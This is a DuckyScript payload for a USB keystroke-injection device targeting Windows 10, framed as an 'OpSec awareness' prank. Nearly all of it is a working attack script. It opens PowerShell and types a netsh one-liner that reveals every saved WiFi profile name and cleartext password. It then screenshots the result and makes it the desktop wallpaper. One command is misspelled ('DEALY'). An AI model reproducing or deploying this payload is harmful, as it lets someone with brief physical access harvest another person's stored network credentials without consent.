REM Title: WiFi_OpSec_Awareness
REM Author: LulzAnarchyAnon
REM Description: PowerShell is opened, and a script 
REM runs that shows all WiFi Profile names, and 
REM passwords. A screenshot is then taken, and saved 
REM to the Pictures\Screenshots folder. It is then 
REM set as the Desktop wallpaper.
REM Target: Windows 10 PowerShell 
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0
REM Category: General

GUI r
DELAY 100
STRING powershell 
DELAY 200
ENTER
DELAY 200
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize 
DELAY 1000
ENTER
DELAY 500
ALT ENTER
DELAY 1000
GUI PRINTSCREEN
DELAY 500
ALT ENTER
DELAY 500
STRING explorer.exe
DELAY 200
ENTER
DELAY 200
ALT d
DEALY 200
STRING Pictures\Screenshots
DELAY 200
ENTER
DELAY 1000
CTRL a
DELAY 200
ALT J
DELAY 200
B
DELAY 200
ALT F4
DELAY 500
STRING exit
DELAY 100
ENTER
